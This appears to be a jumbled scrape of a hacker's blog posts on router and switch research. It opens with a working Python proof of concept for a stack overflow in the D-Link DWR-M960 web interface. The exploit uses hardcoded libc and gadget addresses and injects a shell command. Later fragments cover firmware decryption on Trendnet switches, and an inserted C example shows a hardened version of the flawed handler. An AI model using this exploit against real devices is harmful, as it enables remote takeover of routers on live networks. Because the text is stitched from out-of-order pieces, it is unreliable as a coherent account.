Pentest, OSINT, reverse engineering, RCE/LPE addict.
My name is Johnny Clathetic.
Dark thought and weird to understand jokes. "If you don't understand, assume that I'm dumb."
https://heapdump.alwaysdata.net/

And here is the PoC, ugly, but working:
```python
#! /usr/bin/python3

import requests
import sys

# just auth with a browser and grab the cookie
# the js code is awful, I'm too bored to reverse it
cookies = {"webuicookie":sys.argv[1]}
host="http://127.0.0.1" #adjust

# We need to browse /wlmultipleap.htm first
page1="/wlmultipleap.htm"
# otherwise form is not accessible
page2="/boafrm/formWlanMultipleAP"

r = requests.get(host+page1, cookies=cookies)
hdr={"Content-Type": "application/x-www-form-urlencoded"}

data="wlanIdx=wlanidx&wl_ssid1=wl_ssid&submit-url="
data = data+"%2f"+"aa;echo dlink dwrM960_is_pwned>/tmp/pwn; id >> /tmp/pwn;"+"a"*209
data = data+"%e8%50%d5%3F" #system() @ in libc : 0x3fd25000+0x300E8 : s0 register
data = data+"aaaaaabaacaadaaeaafaagaahaaiaaja" #pad
data = data+"%1C%F4%D3%3F" #gadget@ move t9,s0; jalr t9, lw a0,64(sp)
data = data+"akaalaamaanaaoaapaaqaaraasaataauaavaawaaxaayaazabaabbabcabdabeab" #pad
data = data+"%C8%01%80%40" #stack addr 0x408001c8
data = data+"fabgabhabiabjabkablabmabnaboabpabqabrabsabtabuabvabwabxabyabzacaacbaccacdaceacfacgachaciacjackaclacmac.htm" #pad

r = requests.post(host+page2, cookies=cookies, headers=hdr, data=data)
```
In my PoC, I wanted to do:
`echo dlink dwrM960_is_pwned>/tmp/pwn; id >> /tmp/pwn;`
but the id applet is not compiled into the busybox :D :D

Is it a #0day? Yeah, I guess?
The sub_455480 function is flawed. This function parses some data sent to boafrm/formWlanMultipleAP. Guess what it does with the submit-url parameter? Yep, printf to a stack var. We can't use null bytes, but libc is loaded at 0x3fd25000 so it's not a problem (and ASLR/PIE is nonexistent on those small routers), so everything can be hardcoded.
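To make the class of bug in that post concrete from the defender's side, here is an added example (not the router's firmware, not the author's code) contrasting the unbounded "format a request parameter into a fixed stack buffer" pattern with a bounded, allow-listed version. The buffer size, function names and the allow-list are assumptions chosen for the demo; nothing here reproduces sub_455480.

```c
#include <ctype.h>
#include <stdio.h>
#include <string.h>

/* Assumed size of the stack buffer that receives submit-url.
 * Constructed for this demo; not the real firmware's layout. */
#define SUBMIT_URL_BUF 64

/* Flawed pattern: sprintf(buf, "%s", param) with no length bound.
 * Instead of performing the overflowing write, this computes how many
 * bytes such a call would emit, so the demo never corrupts its own stack. */
static int unbounded_write_len(const char *param)
{
    return snprintf(NULL, 0, "%s", param);
}

/* 1 if an unbounded copy of param would run past SUBMIT_URL_BUF
 * (overwriting saved registers and the return address on MIPS), else 0. */
int would_overflow(const char *param)
{
    return unbounded_write_len(param) >= SUBMIT_URL_BUF;
}

/* Hardened handler: explicit bound, explicit rejection of over-long values,
 * and a character allow-list so the value cannot carry ';' or other shell
 * metacharacters into whatever later consumes it.
 * Returns the copied length, or -1 if the parameter is rejected. */
int submit_url_accepts(const char *param)
{
    char buf[SUBMIT_URL_BUF];

    if (param == NULL)
        return -1;

    size_t len = strnlen(param, sizeof buf);
    if (len == sizeof buf)          /* no NUL within the buffer: too long */
        return -1;

    for (size_t i = 0; i < len; i++) {
        unsigned char c = (unsigned char)param[i];
        if (!(isalnum(c) || c == '/' || c == '.' || c == '_' || c == '-'))
            return -1;              /* reject anything outside a page path */
    }

    memcpy(buf, param, len + 1);    /* bounded: len < sizeof buf is guaranteed */
    return (int)len;
}

/* Constructed over-long input (300 'a's): the legacy pattern would overflow,
 * the hardened handler rejects it. Returns 1 when both hold. */
int long_param_demo(void)
{
    char longparam[300];
    memset(longparam, 'a', sizeof longparam - 1);
    longparam[sizeof longparam - 1] = '\0';
    return would_overflow(longparam) == 1 && submit_url_accepts(longparam) == -1;
}

int main(void)
{
    printf("/wlmultipleap.htm accepted, len=%d\n", submit_url_accepts("/wlmultipleap.htm"));
    printf("value with ';' accepted? %d\n", submit_url_accepts("/aa;id") != -1);
    printf("long value: legacy overflows and hardened rejects? %d\n", long_param_demo());
    return 0;
}
```

The allow-list is the part that matters beyond the length check: a parameter that is later handed to a shell needs both a bound and a character restriction, and the bound alone only closes the memory-corruption path.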
At last. Finally got RCE on the D-Link DWR M960.
Look at this:

This one is really weird… I’ve been trying to reproduce this:
https://github.com/LX-66-LX/cve-new/issues/28

And I swear I had to pull some magical gdb shenanigans just to make boa start at all. Meanwhile this guy just clicks “go” and it works? Look at his screen! And I feel like I’m missing some fundamental brain cell everyone else got at birth.

Now what, overflow with text only to pivot from $pc control to a real exploit? Story will follow soon. I have a strange feeling about this.

"Cutting edge AI-driven reverse engineering tools"
Cutting-edge AI tools 😂 Dudes, just learn the "grep" command?

And who calls this function?
CmFWImgDecryptHandler.

Yes. Literally “firmware image decrypt handler”. Subtle.

This is good. This is hope. And somehow (against all odds) we even get the key, see image.

At this point, we have choices. None of them feel good.

We can download aescrypt and try to decrypt the file directly → it fails. Of course it does. Trendnet must have tweaked something in the algorithm.

We can reimplement the code in Python → because I am lazy and tired, I ask ChatGPT to translate the C code. It fails. I try Claude. I try Mistral. All three translations are different. None of them work. Incredible.

Or… we can just ask ISS.exe to decrypt the file for us.

We pick the path of least dignity.

So let’s open ISS.exe and look for something—anything—related to aescrypt. And yes, buried in there, we find a function named decrypt_stream, complete with sanity checks on the aescrypt header:

Here is the story. Or at least what’s left of it after too much coffee and not enough sleep.

I was doom-scrolling vendor websites when I noticed the Trendnet TEG switches. They let you download the firmware, which already felt like a small miracle. So I grabbed the first thing I saw:

Web Smart L2+ Firmware Release Notes
Model: TEG-204WS, TEG-284WS, TEG-524WS, TPE-082WS, TPE-204US, TPE-5028WS, TPE-5048WS, TPE-5240WS, TPE-1620WSF, TPE-1021WS
H/W Version: v1.0R
Model: TEG-082WS, TPE-1620WS, TPE-2840WS
H/W Version: v2.0R

Looks fine. Clean. Promising. Of course, reality immediately intervenes: the firmware is encrypted.
Great. Fantastic. Love that for me.